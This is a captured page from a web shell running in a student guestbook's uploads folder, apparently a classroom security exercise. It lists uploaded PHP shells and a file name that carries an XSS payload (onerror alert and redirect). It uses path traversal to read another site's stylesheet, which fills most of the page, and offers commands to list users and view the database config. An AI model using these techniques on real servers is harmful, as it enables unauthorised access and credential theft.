🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../586837.klas4s23.mid-ica.nl/public_html/individual stylesheets/style-p.css

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

@font-face {
  font-family: Saira;
  src: url(Saira-Regular.ttf);
}

html {
  font-size: 10px;
}

body {
  margin: 0;
  font-family: Saira;
  height: 100vh;
  width: 100vw;
  overflow-x: hidden;
  /* position: relative; */
  background-color: #121212;

}

.header {
  display: flex;
  align-items: center;
  justify-content: space-between;
  width: 100%;
  background-color: #161618;
  height: 9.5rem;
  position: fixed;
  top: 0;
  left: 0;
}

.header img {
  height: 7rem;
  width: auto;
  margin-left: 1rem;
}

.navbar {
  font-size: 2rem;
  text-align: right;
}

.navbar a {
  text-decoration: none;
  color: white;
  margin: 0 4rem;
  transition: all 0.15s linear;
}

.navbar a[href="projecten.html"] {
  color: #dc133b;
}

.navbar a:hover {
  color: #dc133b;
  border-bottom: #ffffff solid 0.1rem;
}

.info {
  grid-area: info;
  padding-left: 3rem;
  padding-bottom: 5rem;
  padding-top: 1.5rem;

}

.info-h1 {
  font-size: 4rem;
  color: #dc133b;
}

.info-h2 {
  font-size: 2.5rem;
  color: #ffffff;
}

.line {
  width: 39.9rem;
  border: #ffffff solid 0.2rem;
  margin-top: 0.6rem;
  margin-bottom: 1rem;
}



.content::-webkit-scrollbar {
  display: none;
}

.container-content::-webkit-scrollbar {
  display: none;
}

.container-content {
  display: grid;
  grid-template-columns: 1fr 1fr 1fr;
  grid-template-rows: 1.5fr;
  gap: 5rem 0; 
  grid-auto-flow: row;
  grid-template-areas:
    "projecten1 projecten2 projecten3"
    "projecten4 projecten5 projecten6";
  width: 100%;
  justify-items: center;
  overflow-y: scroll;
  

}

.projecten1 {
  margin-top: 1rem;
  grid-area: projecten1;
}

.projecten2 {
  grid-area: projecten2;
  margin-top: 1rem;
}

.projecten3 {
  grid-area: projecten3;
  margin-top: 1rem;
}

.projecten4 {
  grid-area: projecten4;
  margin-top: 1rem;
}

.projecten5 {
  grid-area: projecten5;
  margin-top: 1rem;
}

.projecten6 {
  grid-area: projecten6;
  margin-top: 1rem;
}

.projecten1,
.projecten2,
.projecten3,
.projecten4,
.projecten5,
.projecten6 {
  display: flex;
  /* width: 100%; */
  height: auto;
  /* background-color: #ffe600; */
  /* border: solid 1px rgb(255, 255, 255); */
  /* align-items: center; */
  /* justify-content: center; */
  flex-direction: column;
  margin: 4rem 2rem;
  

}

.foto {
  width: 100%;
}

.titel {
  width: 100%;
  
}

#p-foto {
  width: 50rem;
  border-radius: 0.7rem;
}

#p-foto:hover {
  transform: scale(1.015);
  transition: .2s;
  cursor: pointer;
}

.p-titel {
  color: #ffffff;
  font-size: 3rem;
  margin-top: 0.5rem;

}

.clr-accent {
  color: #dc133b;
}

.footer {
  grid-area: footer;
  width: 100%;
  height: 100%;
  display: flex;
  justify-content: space-between;
  align-items: center;
}

.footer h2 {
  font-size: 1.7rem;
  color: #ffffff;
  padding: 0 1rem;
}

.contact {
  display: flex;
  align-items: center;
  padding-right: 0.5rem;
}

.icon {
  color: #dc133b;
  background-color: #121212;
  font-size: 3.5rem;
  padding: 0 0.5rem;
}

.content {
  flex: 1;
  display: grid;
  grid-template-columns: 1fr;
  grid-template-rows: 1fr 4rem;
  gap: 0px 0px;
  grid-auto-flow: row;
  grid-template-areas:
    "context"
    "footer";
  height: 100%;
  width: 100%;
  overflow-y: scroll;
}

.context {
  grid-area: context;
  display: flex;
  margin-top: 9rem;
  flex-direction: column;
}
/* 
.content::-webkit-scrollbar {
  display: none;
} */

.clr-accent {
  color: #dc133b;
}

.container-mb {
  display: none;
}

.menu {
  display: flex;
  flex-direction: row;
  list-style-type: none;
  margin: 0;
  padding: 0;
}

.menu>li {
  margin: 0.5em 0;
  overflow: hidden;
}

.menu-button-container {
  display: none;
  height: 100%;
  width: 100%;
  cursor: pointer;
  flex-direction: column;
  justify-content: center;
  align-items: flex-end;
}

#menu-toggle {
  display: none;
}

.menu-button,
.menu-button::before,
.menu-button::after {
  display: block;
  background-color: #ffffff;
  position: absolute;
  height: 0.4rem;
  width: 3rem;
  border-radius: 0.1rem;
}

.menu-button::before {
  content: '';
  margin-top: -8px;
}

.menu-button::after {
  content: '';
  margin-top: 8px;
}

#menu-toggle:checked+.menu-button-container .menu-button::before {
  margin-top: 0px;
  transform: rotate(405deg);
}

#menu-toggle:checked+.menu-button-container .menu-button {
  background: rgba(255, 255, 255, 0);
}

#menu-toggle:checked+.menu-button-container .menu-button::after {
  margin-top: 0px;
  transform: rotate(-405deg);
}

.mb {
  display: none;
}

.container-pc {
  width: 100%;
  height: 100%;
  background-image: url("hex-pattern.png");
  background-repeat: no-repeat;
  background-position: bottom right;
  background-size: 30%;
  overflow-y: hidden;
}

@media (max-width: 1622px) {
  .container-content  {
     display: grid;
  grid-template-columns: 1fr 1fr;
  grid-template-rows: 1.5fr;
  gap: 5rem 0; 
  grid-auto-flow: row;
  grid-template-areas:
    "projecten1 projecten2" 
    "projecten3 projecten4"
    "projecten5 projecten6";
  width: 100%;
  justify-items: center;
  overflow-y: scroll;
  }
}

@media (max-width: 1080px) {
  .container-content  {
     display: grid;
  grid-template-columns: 1fr;
  grid-template-rows: 1.5fr;
  gap: 5rem 0; 
  grid-auto-flow: row;
  grid-template-areas:
    "projecten1" 
    "projecten2"
    "projecten3"
    "projecten4"
    "projecten5"
    "projecten6";
  width: 100%;
  justify-items: center;
  overflow-y: scroll;
  }

  
}


@media (max-width: 1023px) {


  .container-pc {
    display: none;
  }

  .container-mb {
    display: grid;
    grid-template-columns: 1fr;
    grid-template-rows: 9rem 1fr 3rem;
    gap: 0px 0px;
    grid-auto-flow: row;
    grid-template-areas:
      "header-mb"
      "content-mb"
      "footer-mb";
    height: 100vh;
    width: 100vw;
    overflow-y: scroll;

    /* background-image: url("hex-pattern.png");
    background-repeat: no-repeat;
    background-position: bottom right;
    background-size: 90%; */
  }

  .hamburger-menu {
    height: 100%;
    width: 0;
    float: right;
    margin-right: 5%;
  }

  .header-mb {
    grid-area: header-mb;
    display: flex;
    justify-content: space-between;
    position: fixed;
    width: 100%;
    height: 9rem;
    background-color: #161618;
  }

  .header-mb img {
    margin: 1rem 0 1rem 1rem;
    width: 20rem;
    height: auto;
  }

  .content-mb {
    grid-area: content-mb;
    display: flex;
    flex-direction: column;
  }


  .footer-mb {
    grid-area: footer-mb;
    width: 100%;
    height: 3rem;
    display: flex;
    justify-content: space-between;
    align-items: center;
  }

  .footer-mb h2 {
    font-size: 0.9rem;
    color: #ffffff;
    padding-left: 1rem;
    padding-right: 1rem;
  }

  .contact-mb {
    display: flex;
    align-items: center;
    padding-right: 1rem;
  }

  .icon-mb {
    color: #dc133b;
    background-color: #121212;
    font-size: 2.5rem;
    padding: 0rem;
  }

  .navbar-mb {
    width: 50%;
    background-color: #161618;
    margin-right: 1rem;
  }

  .menu-button-container {
    float: right;
    justify-self: center;
  }

  .menu-button-container {
    display: flex;
  }

  .menu {
    position: absolute;
    top: 9rem;
    right: 0;
    flex-direction: column;
    width: 100%;
    justify-content: center;
    align-items: center;
  }

  #menu-toggle~.menu li {
    height: 0;
    margin: 0;
    padding: 0;
    border: 0;
    transition: height 400ms cubic-bezier(0.23, 1, 0.32, 1);
  }

  #menu-toggle:checked~.menu li {
    height: 10rem;
    transition: height 400ms cubic-bezier(0.23, 1, 0.32, 1);
    border-top: #ffffff solid 0.1rem;
  }

  #menu-toggle:checked~.menu .cv-mb {
    height: 10rem;
    transition: height 400ms cubic-bezier(0.23, 1, 0.32, 1);
    border-bottom: #ffffff solid 0.1rem;
  }

  .menu>li {
    display: flex;
    justify-content: center;
    width: 100%;
    height: 100%;
    color: #ffffff;
    background-color: #161618;
    font-size: 2rem;
    text-decoration: none;
    z-index: 778;
  }

  .menu a {
    color: #ffffff;
    height: 100%;
    text-decoration: none;
    display: flex;
    align-items: center;
    justify-content: center;
  }

  .menu a[href="projecten.html"] {
    color: #dc133b;
    width: 100%;
    text-align: center;
  }

  .container-content-mb {
    display: grid;
    grid-template-columns: 1fr;
    grid-template-rows: 1fr;
    /* 1fr 1fr 1fr 1fr 1fr; */
    gap: 4rem 0;
    grid-auto-flow: row;
    grid-template-areas:
      "projecten1" 
      /* "projecten2"  */
      /* "projecten3" */
      /* "projecten4"  */
      /* "projecten5"  */
      /* "projecten6" */
      ;
    width: 100%;
    justify-items: center;
    overflow-y: scroll;

  }

  .projecten1-mb {
    margin-top: 1%;
    grid-area: projecten1;
  }

  .projecten2-mb {
    grid-area: projecten2;
    margin-top: 1%;
  }

  .projecten3-mb {
    grid-area: projecten3;
    margin-top: 1%;
  }

  .projecten4-mb {
    grid-area: projecten4;
    margin-top: 5%;
  }

  .projecten5-mb {
    grid-area: projecten5;
    margin-top: 5%;
  }

  .projecten6-mb {
    grid-area: projecten6;
    margin-top: 5%;
  }

  .projecten1-mb,
  .projecten2-mb,
  .projecten3-mb,
  .projecten4-mb,
  .projecten5-mb,
  .projecten6-mb {
    display: flex;
    width: 90%;
    height: auto;
    /* background-color: #ffe600; */
    /* border: solid 1px rgb(255, 255, 255); */
    /* align-items: center; */
    /* justify-content: center; */
    flex-direction: column;

  }

  .foto-mb {
    width: 100%;
    height: auto;
    display: flex;
    justify-content: center;
    /* background-color: rgb(255, 0, 0); */
  }

  .titel {
    width: 100%;
    height: auto;
    /* background-color: #1aff00; */
  }

  #p-foto-mb {
    width: 100%;
    height: auto;
    border-radius: 0.7rem;
  }

  .p-titel-mb {
    color: #ffffff;
    font-size: 6.5vw;
    /* margin-top: 2%; */
    text-align: center;
  }

  h1 {
    color: white;
  }

  .info-mb {
    grid-area: info;
    margin: 2% 2%;
    margin-bottom: 10%;
  }

  .info-h1-mb {
    font-size: 6.5vw;
    color: #dc133b;
  }

  .info-h2-mb {
    font-size: 4.5vw;
    color: #ffffff;
  }

  .line-mb {
    width: 74.5%;
    border: #ffffff solid 0.1rem;
    margin-top: 0.3%;
    margin-bottom: 0.6%;
  }

}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!